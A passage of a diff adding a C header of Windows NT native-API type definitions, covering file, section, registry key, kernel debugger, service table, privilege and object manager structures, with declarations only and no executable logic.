ULONG EaSize; + CCHAR ShortNameLength; + WCHAR ShortName[12]; + WCHAR FileName[1]; +} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; + +typedef struct _FILE_ID_BOTH_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + CCHAR ShortNameLength; + WCHAR ShortName[12]; + LARGE_INTEGER FileId; + WCHAR FileName[1]; +} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION; + +typedef struct _FILE_NAMES_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION; + +typedef struct _FILE_OBJECTID_INFORMATION { + LONGLONG FileReference; + UCHAR ObjectId[16]; + union { + struct { + UCHAR BirthVolumeId[16]; + UCHAR BirthObjectId[16]; + UCHAR DomainId[16]; + }; + UCHAR ExtendedInfo[48]; + }; +} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION; + +typedef struct _FILE_FS_VOLUME_INFORMATION { + LARGE_INTEGER VolumeCreationTime; + ULONG VolumeSerialNumber; + ULONG VolumeLabelLength; + BOOLEAN SupportsObjects; + WCHAR VolumeLabel[1]; +} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION; + +/* +** File END +*/ + +/* +** Section START +*/ + +#ifndef _SECTION_INFORMATION_CLASS +typedef enum _SECTION_INFORMATION_CLASS { + SectionBasicInformation, + SectionImageInformation, + SectionRelocationInformation, + MaxSectionInfoClass +} SECTION_INFORMATION_CLASS; +#endif + +typedef struct _SECTIONBASICINFO { + PVOID BaseAddress; + ULONG AllocationAttributes; + LARGE_INTEGER MaximumSize; +} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION; + +typedef struct _SECTION_IMAGE_INFORMATION { + PVOID TransferAddress; + ULONG ZeroBits; + SIZE_T MaximumStackSize; + SIZE_T CommittedStackSize; + ULONG SubSystemType; + union { + 
struct { + USHORT SubSystemMinorVersion; + USHORT SubSystemMajorVersion; + }; + ULONG SubSystemVersion; + }; + ULONG GpValue; + USHORT ImageCharacteristics; + USHORT DllCharacteristics; + USHORT Machine; + BOOLEAN ImageContainsCode; + BOOLEAN Spare1; + ULONG LoaderFlags; + ULONG ImageFileSize; + ULONG Reserved[1]; +} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; + +typedef struct _SECTION_IMAGE_INFORMATION64 { + ULONGLONG TransferAddress; + ULONG ZeroBits; + ULONGLONG MaximumStackSize; + ULONGLONG CommittedStackSize; + ULONG SubSystemType; + union { + struct { + USHORT SubSystemMinorVersion; + USHORT SubSystemMajorVersion; + }; + ULONG SubSystemVersion; + }; + ULONG GpValue; + USHORT ImageCharacteristics; + USHORT DllCharacteristics; + USHORT Machine; + BOOLEAN ImageContainsCode; + BOOLEAN Spare1; + ULONG LoaderFlags; + ULONG ImageFileSize; + ULONG Reserved[1]; +} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64; + +typedef enum _SECTION_INHERIT { + ViewShare = 1, + ViewUnmap = 2 +} SECTION_INHERIT; + +#define SEC_BASED 0x200000 +#define SEC_NO_CHANGE 0x400000 +#define SEC_FILE 0x800000 +#define SEC_IMAGE 0x1000000 +#define SEC_RESERVE 0x4000000 +#define SEC_COMMIT 0x8000000 +#define SEC_NOCACHE 0x10000000 +#define SEC_GLOBAL 0x20000000 +#define SEC_LARGE_PAGES 0x80000000 + +/* +** Section END +*/ + +/* +** Kernel Debugger START +*/ + +#ifndef _SYSDBG_COMMAND +typedef enum _SYSDBG_COMMAND { + SysDbgQueryModuleInformation, + SysDbgQueryTraceInformation, + SysDbgSetTracepoint, + SysDbgSetSpecialCall, + SysDbgClearSpecialCalls, + SysDbgQuerySpecialCalls, + SysDbgBreakPoint, + SysDbgQueryVersion, + SysDbgReadVirtual, + SysDbgWriteVirtual, + SysDbgReadPhysical, + SysDbgWritePhysical, + SysDbgReadControlSpace, + SysDbgWriteControlSpace, + SysDbgReadIoSpace, + SysDbgWriteIoSpace, + SysDbgReadMsr, + SysDbgWriteMsr, + SysDbgReadBusData, + SysDbgWriteBusData, + SysDbgCheckLowMemory, + SysDbgEnableKernelDebugger, + SysDbgDisableKernelDebugger, + 
SysDbgGetAutoKdEnable, + SysDbgSetAutoKdEnable, + SysDbgGetPrintBufferSize, + SysDbgSetPrintBufferSize, + SysDbgGetKdUmExceptionEnable, + SysDbgSetKdUmExceptionEnable, + SysDbgGetTriageDump, + SysDbgGetKdBlockEnable, + SysDbgSetKdBlockEnable, + SysDbgRegisterForUmBreakInfo, + SysDbgGetUmBreakPid, + SysDbgClearUmBreakPid, + SysDbgGetUmAttachPid, + SysDbgClearUmAttachPid +} SYSDBG_COMMAND, *PSYSDBG_COMMAND; +#endif + +#ifndef _SYSDBG_VIRTUAL +typedef struct _SYSDBG_VIRTUAL +{ + PVOID Address; + PVOID Buffer; + ULONG Request; +} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; +#endif + +/* +** Kernel Debugger END +*/ + +/* +** System Table START +*/ +#define NUMBER_SERVICE_TABLES 2 +#define SERVICE_NUMBER_MASK ((1 << 12) - 1) + +#if defined(_WIN64) + +#if defined(_AMD64_) + +#define SERVICE_TABLE_SHIFT (12 - 4) +#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4) +#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4) + +#else + +#define SERVICE_TABLE_SHIFT (12 - 5) +#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5) +#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5) + +#endif + +#else + +#define SERVICE_TABLE_SHIFT (12 - 4) +#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4) +#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4) + +#endif + +typedef struct _KSERVICE_TABLE_DESCRIPTOR { + ULONG_PTR Base; //e.g. KiServiceTable + PULONG Count; + ULONG Limit;//e.g. KiServiceLimit + PUCHAR Number; //e.g. 
KiArgumentTable +} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR; +/* +** System Table END +*/ + + +/* +** System Boot Environment START +*/ + +typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 // Size=20 +{ + struct _GUID BootIdentifier; + enum _FIRMWARE_TYPE FirmwareType; +} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1; + +typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION // Size=32 +{ + struct _GUID BootIdentifier; + enum _FIRMWARE_TYPE FirmwareType; + unsigned __int64 BootFlags; +} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION; + +/* +** System Boot Environment END +*/ + +/* +** Mutant START +*/ + +#ifndef _MUTANT_INFORMATION_CLASS +typedef enum _MUTANT_INFORMATION_CLASS { + MutantBasicInformation +} MUTANT_INFORMATION_CLASS; +#endif + +#ifndef _MUTANT_BASIC_INFORMATION +typedef struct _MUTANT_BASIC_INFORMATION { + LONG CurrentCount; + BOOLEAN OwnedByCaller; + BOOLEAN AbandonedState; +} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION; +#endif + +/* +** Mutant END +*/ + +/* +** Key START +*/ + +#ifndef _KEY_INFORMATION_CLASS +typedef enum _KEY_INFORMATION_CLASS { + KeyBasicInformation, + KeyNodeInformation, + KeyFullInformation, + KeyNameInformation, + KeyCachedInformation, + KeyFlagsInformation, + MaxKeyInfoClass +} KEY_INFORMATION_CLASS; +#endif + +#ifndef _KEY_FULL_INFORMATION +typedef struct _KEY_FULL_INFORMATION { + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG ClassOffset; + ULONG ClassLength; + ULONG SubKeys; + ULONG MaxNameLen; + ULONG MaxClassLen; + ULONG Values; + ULONG MaxValueNameLen; + ULONG MaxValueDataLen; + WCHAR Class[1]; +} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION; +#endif + +#ifndef _KEY_BASIC_INFORMATION +typedef struct _KEY_BASIC_INFORMATION { + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG NameLength; + WCHAR Name[1]; +} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION; +#endif + +#ifndef _KEY_VALUE_INFORMATION_CLASS +typedef enum 
_KEY_VALUE_INFORMATION_CLASS { + KeyValueBasicInformation, + KeyValueFullInformation, + KeyValuePartialInformation, + KeyValueFullInformationAlign64, + KeyValuePartialInformationAlign64, + MaxKeyValueInfoClass +} KEY_VALUE_INFORMATION_CLASS; +#endif + +#ifndef _KEY_VALUE_BASIC_INFORMATION +typedef struct _KEY_VALUE_BASIC_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG NameLength; + WCHAR Name[1]; // Variable size +} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION; +#endif + +#ifndef _KEY_VALUE_FULL_INFORMATION +typedef struct _KEY_VALUE_FULL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataOffset; + ULONG DataLength; + ULONG NameLength; + WCHAR Name[1]; // Variable size + // Data[1]; // Variable size data not declared +} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; +#endif + +#ifndef _KEY_VALUE_PARTIAL_INFORMATION +typedef struct _KEY_VALUE_PARTIAL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataLength; + UCHAR Data[1]; // Variable size +} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; +#endif + +#ifndef _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 +typedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 { + ULONG Type; + ULONG DataLength; + UCHAR Data[1]; // Variable size +} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64; +#endif + +#ifndef _KEY_VALUE_ENTRY +typedef struct _KEY_VALUE_ENTRY { + PUNICODE_STRING ValueName; + ULONG DataLength; + ULONG DataOffset; + ULONG Type; +} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY; +#endif + +/* +** Key END +*/ + +/* +** IoCompletion START +*/ + +#ifndef _IO_COMPLETION_INFORMATION_CLASS +typedef enum _IO_COMPLETION_INFORMATION_CLASS { + IoCompletionBasicInformation +} IO_COMPLETION_INFORMATION_CLASS; +#endif + +#ifndef _IO_COMPLETION_BASIC_INFORMATION +typedef struct _IO_COMPLETION_BASIC_INFORMATION { + LONG Depth; +} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION; +#endif + +/* +** IoCompletion END +*/ + +/* +** Event 
START +*/ + +// +// Event Specific Access Rights. +// + +typedef enum _EVENT_INFORMATION_CLASS { + EventBasicInformation +} EVENT_INFORMATION_CLASS; + +typedef enum _EVENT_TYPE { + NotificationEvent, + SynchronizationEvent +} EVENT_TYPE; + +typedef struct _EVENT_BASIC_INFORMATION { + EVENT_TYPE EventType; + LONG EventState; +} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION; + +/* +** Event END +*/ + +/* +** TIME_FIELDS START +*/ + +#ifndef CSHORT +typedef short CSHORT; +#endif +typedef struct _TIME_FIELDS { + CSHORT Year; // range [1601...] + CSHORT Month; // range [1..12] + CSHORT Day; // range [1..31] + CSHORT Hour; // range [0..23] + CSHORT Minute; // range [0..59] + CSHORT Second; // range [0..59] + CSHORT Milliseconds;// range [0..999] + CSHORT Weekday; // range [0..6] == [Sunday..Saturday] +} TIME_FIELDS; +typedef TIME_FIELDS *PTIME_FIELDS; + +/* +** TIME_FIELDS END +*/ + +/* +** HANDLE START +*/ + +typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { + USHORT UniqueProcessId; + USHORT CreatorBackTraceIndex; + UCHAR ObjectTypeIndex; + UCHAR HandleAttributes; + USHORT HandleValue; + PVOID Object; + ULONG GrantedAccess; +} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; + +typedef struct _SYSTEM_HANDLE_INFORMATION { + ULONG NumberOfHandles; + SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; +} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; + +/* +** HANDLE END +*/ + +// Privileges + +#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L) +#define SE_CREATE_TOKEN_PRIVILEGE (2L) +#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L) +#define SE_LOCK_MEMORY_PRIVILEGE (4L) +#define SE_INCREASE_QUOTA_PRIVILEGE (5L) +#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L) +#define SE_TCB_PRIVILEGE (7L) +#define SE_SECURITY_PRIVILEGE (8L) +#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L) +#define SE_LOAD_DRIVER_PRIVILEGE (10L) +#define SE_SYSTEM_PROFILE_PRIVILEGE (11L) +#define SE_SYSTEMTIME_PRIVILEGE (12L) +#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L) +#define 
SE_INC_BASE_PRIORITY_PRIVILEGE (14L) +#define SE_CREATE_PAGEFILE_PRIVILEGE (15L) +#define SE_CREATE_PERMANENT_PRIVILEGE (16L) +#define SE_BACKUP_PRIVILEGE (17L) +#define SE_RESTORE_PRIVILEGE (18L) +#define SE_SHUTDOWN_PRIVILEGE (19L) +#define SE_DEBUG_PRIVILEGE (20L) +#define SE_AUDIT_PRIVILEGE (21L) +#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L) +#define SE_CHANGE_NOTIFY_PRIVILEGE (23L) +#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L) +#define SE_UNDOCK_PRIVILEGE (25L) +#define SE_SYNC_AGENT_PRIVILEGE (26L) +#define SE_ENABLE_DELEGATION_PRIVILEGE (27L) +#define SE_MANAGE_VOLUME_PRIVILEGE (28L) +#define SE_IMPERSONATE_PRIVILEGE (29L) +#define SE_CREATE_GLOBAL_PRIVILEGE (30L) +#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L) +#define SE_RELABEL_PRIVILEGE (32L) +#define SE_INC_WORKING_SET_PRIVILEGE (33L) +#define SE_TIME_ZONE_PRIVILEGE (34L) +#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L) +#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE + +#ifndef NT_SUCCESS +#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) +#endif + +/* +** OBJECT MANAGER START +*/ + +// +// Header flags +// + +#define OB_FLAG_NEW_OBJECT 0x01 +#define OB_FLAG_KERNEL_OBJECT 0x02 +#define OB_FLAG_CREATOR_INFO 0x04 +#define OB_FLAG_EXCLUSIVE_OBJECT 0x08 +#define OB_FLAG_PERMANENT_OBJECT 0x10 +#define OB_FLAG_DEFAULT_SECURITY_QUOTA 0x20 +#define OB_FLAG_SINGLE_HANDLE_ENTRY 0x40 +#define OB_FLAG_DELETED_INLINE 0x80 + +// +// InfoMask values +// + +#define OB_INFOMASK_PROCESS_INFO 0x10 +#define OB_INFOMASK_QUOTA 0x08 +#define OB_INFOMASK_HANDLE 0x04 +#define OB_INFOMASK_NAME 0x02 +#define OB_INFOMASK_CREATOR_INFO 0x01 + +typedef PVOID *PDEVICE_MAP; + +typedef struct _OBJECT_DIRECTORY_ENTRY { + PVOID ChainLink; + PVOID Object; + ULONG HashValue; +} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY; + +typedef struct _EX_PUSH_LOCK { + union + { + ULONG Locked : 1; + ULONG Waiting : 1; + ULONG Waking : 1; + ULONG MultipleShared : 1; + ULONG Shared : 28; + ULONG Value; + PVOID Ptr; + 
}; +} EX_PUSH_LOCK, *PEX_PUSH_LOCK; + +typedef struct _OBJECT_NAMESPACE_LOOKUPTABLE { + LIST_ENTRY HashBuckets[37]; + EX_PUSH_LOCK Lock; + ULONG NumberOfPrivateSpaces; +} OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE; + +typedef struct _OBJECT_NAMESPACE_ENTRY { + LIST_ENTRY ListEntry; + PVOID NamespaceRootDirectory; + ULONG SizeOfBoundaryInformation; + ULONG Reserved; + UCHAR HashValue; + ULONG Alignment; +} OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY; + +typedef struct _OBJECT_DIRECTORY { + POBJECT_DIRECTORY_ENTRY HashBuckets[37]; + EX_PUSH_LOCK Lock; + PDEVICE_MAP DeviceMap; + ULONG SessionId; + PVOID NamespaceEntry; + ULONG Flags; +} OBJECT_DIRECTORY, *POBJECT_DIRECTORY; + +typedef struct _OBJECT_HEADER_NAME_INFO { + POBJECT_DIRECTORY Directory; + UNICODE_STRING Name; + ULONG QueryReferences; +} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO; + +typedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32 + LIST_ENTRY TypeList; // Size=16 Offset=0 + PVOID CreatorUniqueProcess; // Size=8 Offset=16 + USHORT CreatorBackTraceIndex; // Size=2 Offset=24 + USHORT Reserved; // Size=2 Offset=26 +} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO; + +typedef struct _OBJECT_HANDLE_COUNT_ENTRY {// Size=16 + PVOID Process; // Size=8 Offset=0 + struct + { + unsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24 + unsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8 + }; +} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY; + +typedef struct _OBJECT_HEADER_HANDLE_INFO // Size=16 +{ + union + { + PVOID HandleCountDataBase; // Size=8 Offset=0 + struct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0 + }; +} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO; + +typedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16 + PVOID ExclusiveProcess; // Size=8 Offset=0 + unsigned __int64 Reserved; // Size=8 Offset=8 +} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO; + +typedef struct 
_OBJECT_HEADER_QUOTA_INFO { + ULONG PagedPoolCharge; //4 + ULONG NonPagedPoolCharge; //4 + ULONG SecurityDescriptorCharge; //4 + PVOID SecurityDescriptorQuotaBlock; //sizeof(pointer) + unsigned __int64 Reserved; //sizeof(uint64) +} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO; + +typedef struct _QUAD { + union + { + INT64 UseThisFieldToCopy; + float DoNotUseThisField; + }; +} QUAD, *PQUAD; + +typedef struct _OBJECT_CREATE_INFORMATION { + ULONG Attributes; + PVOID RootDirectory; + CHAR ProbeMode; + ULONG PagedPoolCharge; + ULONG NonPagedPoolCharge; + ULONG SecurityDescriptorCharge; + PVOID SecurityDescriptor; + PSECURITY_QUALITY_OF_SERVICE SecurityQos; + SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; +} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION; + +typedef enum _POOL_TYPE { + NonPagedPool = 0, + NonPagedPoolExecute = 0, + PagedPool = 1, + NonPagedPoolMustSucceed = 2, + DontUseThisType = 3, + NonPagedPoolCacheAligned = 4, + PagedPoolCacheAligned = 5, + NonPagedPoolCacheAlignedMustS = 6, + MaxPoolType = 7, + NonPagedPoolBase = 0, + NonPagedPoolBaseMustSucceed = 2, + NonPagedPoolBaseCacheAligned = 4, + NonPagedPoolBaseCacheAlignedMustS = 6, + NonPagedPoolSession = 32, + PagedPoolSession = 33, + NonPagedPoolMustSucceedSession = 34, + DontUseThisTypeSession = 35, + NonPagedPoolCacheAlignedSession = 36, + PagedPoolCacheAlignedSession = 37, + NonPagedPoolCacheAlignedMustSSession = 38, + NonPagedPoolNx = 512, + NonPagedPoolNxCacheAligned = 516, + NonPagedPoolSessionNx = 544 +} POOL_TYPE; + +typedef struct _OBJECT_TYPE_INITIALIZER_V1 { + USHORT Length; + BOOLEAN UseDefaultObject; + BOOLEAN Reserved1; + ULONG InvalidAttributes; + GENERIC_MAPPING GenericMapping; + ACCESS_MASK ValidAccessMask; + BOOLEAN SecurityRequired; + BOOLEAN MaintainHandleCount; + BOOLEAN MaintainTypeList; + UCHAR Reserved2; + BOOLEAN PagedPool; + ULONG DefaultPagedPoolCharge; + ULONG DefaultNonPagedPoolCharge; + PVOID DumpProcedure; + PVOID OpenProcedure; + PVOID 
CloseProcedure; + PVOID DeleteProcedure; + PVOID ParseProcedure; + PVOID SecurityProcedure; + PVOID QueryNameProcedure; + PVOID OkayToCloseProcedure; +} OBJECT_TYPE_INITIALIZER_V1, *POBJECT_TYPE_INITIALIZER_V1; + +typedef struct _OBJECT_TYPE_INITIALIZER_V2 {// Size=120 + USHORT Length; // Size=2 Offset=0 + UCHAR ObjectTypeFlags; // Size=1 Offset=2 + ULONG ObjectTypeCode; // Size=4 Offset=4 + ULONG InvalidAttributes; // Size=4 Offset=8 + GENERIC_MAPPING GenericMapping; // Size=16 Offset=12 + ULONG ValidAccessMask; // Size=4 Offset=28 + ULONG RetainAccess; // Size=4 Offset=32 + POOL_TYPE PoolType; // Size=4 Offset=36 + ULONG DefaultPagedPoolCharge; // Size=4 Offset=40 + ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44 + PVOID DumpProcedure; // Size=8 Offset=48 + PVOID OpenProcedure; // Size=8 Offset=56 + PVOID CloseProcedure; // Size=8 Offset=64 + PVOID DeleteProcedure; // Size=8 Offset=72 + PVOID ParseProcedure; // Size=8 Offset=80 + PVOID SecurityProcedure; // Size=8 Offset=88 + PVOID QueryNameProcedure; // Size=8 Offset=96 + PVOID OkayToCloseProcedure; // Size=8 Offset=104 +} OBJECT_TYPE_INITIALIZER_V2, *POBJECT_TYPE_INITIALIZER_V2; + +typedef struct _OBJECT_TYPE_INITIALIZER_V3 {// Size=120 + USHORT Length; // Size=2 Offset=0 + UCHAR ObjectTypeFlags; // Size=1 Offset=2 + ULONG ObjectTypeCode; // Size=4 Offset=4 + ULONG InvalidAttributes; // Size=4 Offset=8 + GENERIC_MAPPING GenericMapping; // Size=16 Offset=12 + ULONG ValidAccessMask; // Size=4 Offset=28 + ULONG RetainAccess; // Size=4 Offset=32 + POOL_TYPE PoolType; // Size=4 Offset=36 + ULONG DefaultPagedPoolCharge; // Size=4 Offset=40 + ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44 + PVOID DumpProcedure; // Size=8 Offset=48 + PVOID OpenProcedure; // Size=8 Offset=56 + PVOID CloseProcedure; // Size=8 Offset=64 + PVOID DeleteProcedure; // Size=8 Offset=72 + PVOID ParseProcedure; // Size=8 Offset=80 + PVOID SecurityProcedure; // Size=8 Offset=88 + PVOID QueryNameProcedure; // Size=8 Offset=96 + PVOID 
OkayToCloseProcedure; // Size=8 Offset=104 + ULONG WaitObjectFlagMask; // Size=4 Offset=112 + USHORT WaitObjectFlagOffset; // Size=2 Offset=116 + USHORT WaitObjectPointerOffset; // Size=2 Offset=118 +} OBJECT_TYPE_INITIALIZER_V3, *POBJECT_TYPE_INITIALIZER_V3; + +typedef struct _OBJECT_TYPE_INITIALIZER {// Size=120 + USHORT Length; // Size=2 Offset=0 + UCHAR ObjectTypeFlags; // Size=1 Offset=2 + ULONG ObjectTypeCode; // Size=4 Offset=4 + ULONG InvalidAttributes; // Size=4 Offset=8 + GENERIC_MAPPING GenericMapping; // Size=16 Offset=12 + ULONG ValidAccessMask; // Size=4 Offset=28 + ULONG RetainAccess; // Size=4 Offset=32 + POOL_TYPE PoolType; // Size=4 Offset=36 + ULONG DefaultPagedPoolCharge; // Size=4 Offset=40 + ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44 + PVOID DumpProcedure; // Size=8 Offset=48 + PVOID OpenProcedure; // Size=8 Offset=56 + PVOID CloseProcedure; // Size=8 Offset=64 + PVOID DeleteProcedure; // Size=8 Offset=72 + PVOID ParseProcedure; // Size=8 Offset=80 + PVOID SecurityProcedure; // Size=8 Offset=88 + PVOID QueryNameProcedure; // Size=8 Offset=96 + PVOID OkayToCloseProcedure; // Size=8 Offset=104 +} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER; + +typedef struct _OBJECT_TYPE_V2 {// Size=216 + LIST_ENTRY TypeList; // Size=16 Offset=0 + UNICODE_STRING Name; // Size=16 Offset=16 + PVOID DefaultObject; // Size=8 Offset=32 + UCHAR Index; // Size=1 Offset=40 + ULONG TotalNumberOfObjects; // Size=4 Offset=44 + ULONG TotalNumberOfHandles; // Size=4 Offset=48 + ULONG HighWaterNumberOfObjects; // Size=4 Offset=52 + ULONG HighWaterNumberOfHandles; // Size=4 Offset=56 + OBJECT_TYPE_INITIALIZER_V2 TypeInfo; + EX_PUSH_LOCK TypeLock; + ULONG Key; + LIST_ENTRY CallbackList; +} OBJECT_TYPE_V2, *POBJECT_TYPE_V2; + +typedef struct _OBJECT_TYPE_V3 {// Size=216 + LIST_ENTRY TypeList; // Size=16 Offset=0 + UNICODE_STRING Name; // Size=16 Offset=16 + PVOID DefaultObject; // Size=8 Offset=32 + UCHAR Index; // Size=1 Offset=40 + ULONG TotalNumberOfObjects; 
// Size=4 Offset=44 + ULONG TotalNumberOfHandles; // Size=4 Offset=48 + ULONG HighWaterNumberOfObjects; // Size=4 Offset=52 + ULONG HighWaterNumberOfHandles; // Size=4 Offset=56 + OBJECT_TYPE_INITIALIZER_V3 TypeInfo; + EX_PUSH_LOCK TypeLock; + ULONG Key; + LIST_ENTRY CallbackList; +} OBJECT_TYPE_V3, *POBJECT_TYPE_V3; + +typedef struct _OBJECT_TYPE_COMPATIBLE { + LIST_ENTRY TypeList; + UNICODE_STRING Name; + PVOID DefaultObject; + UCHAR Index; + ULONG TotalNumberOfObjects; + ULONG TotalNumberOfHandles; + ULONG HighWaterNumberOfObjects; + ULONG HighWaterNumberOfHandles; + OBJECT_TYPE_INITIALIZER_V2 TypeInfo; +} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE; + +/* +** brand new header starting from 6.1 +*/ + +typedef struct _OBJECT_HEADER { + LONG PointerCount; + union + { + LONG HandleCount; + PVOID NextToFree; + }; + EX_PUSH_LOCK Lock; + UCHAR TypeIndex; + UCHAR TraceFlags; + UCHAR InfoMask; + UCHAR Flags; + union + { + POBJECT_CREATE_INFORMATION ObjectCreateInfo; + PVOID QuotaBlockCharged; + }; + PVOID SecurityDescriptor; + QUAD Body; +} OBJECT_HEADER, *POBJECT_HEADER; + +#define OBJECT_TO_OBJECT_HEADER(obj) \ + CONTAINING_RECORD( (obj), OBJECT_HEADER, Body ) + +/* +** OBJECT MANAGER END +*/ + +/* +* WDM START +*/ +#define TIMER_TOLERABLE_DELAY_BITS 6 +#define TIMER_EXPIRED_INDEX_BITS 6 +#define TIMER_PROCESSOR_INDEX_BITS 5 + +typedef struct _DISPATCHER_HEADER { + union { + union { + volatile LONG Lock; + LONG LockNV; + } DUMMYUNIONNAME; + + struct { // Events, Semaphores, Gates, etc. 
+ UCHAR Type; // All (accessible via KOBJECT_TYPE) + UCHAR Signalling; + UCHAR Size; + UCHAR Reserved1; + } DUMMYSTRUCTNAME; + + struct { // Timer + UCHAR TimerType; + union { + UCHAR TimerControlFlags; + struct { + UCHAR Absolute : 1; + UCHAR Wake : 1; + UCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS; + } DUMMYSTRUCTNAME; + }; + + UCHAR Hand; + union { + UCHAR TimerMiscFlags; + struct { + +#if !defined(KENCODED_TIMER_PROCESSOR) + + UCHAR Index : TIMER_EXPIRED_INDEX_BITS; + +#else + + UCHAR Index : 1; + UCHAR Processor : TIMER_PROCESSOR_INDEX_BITS; + +#endif + + UCHAR Inserted : 1; + volatile UCHAR Expired : 1; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; + } DUMMYSTRUCTNAME2; + + struct { // Timer2 + UCHAR Timer2Type; + union { + UCHAR Timer2Flags; + struct { + UCHAR Timer2Inserted : 1; + UCHAR Timer2Expiring : 1; + UCHAR Timer2CancelPending : 1; + UCHAR Timer2SetPending : 1; + UCHAR Timer2Running : 1; + UCHAR Timer2Disabled : 1; + UCHAR Timer2ReservedFlags : 2; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; + + UCHAR Timer2Reserved1; + UCHAR Timer2Reserved2; + } DUMMYSTRUCTNAME3; + + struct { // Queue + UCHAR QueueType; + union { + UCHAR QueueControlFlags; + struct { + UCHAR Abandoned : 1; + UCHAR DisableIncrement : 1; + UCHAR QueueReservedControlFlags : 6; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; + + UCHAR QueueSize; + UCHAR QueueReserved; + } DUMMYSTRUCTNAME4; + + struct { // Thread + UCHAR ThreadType; + UCHAR 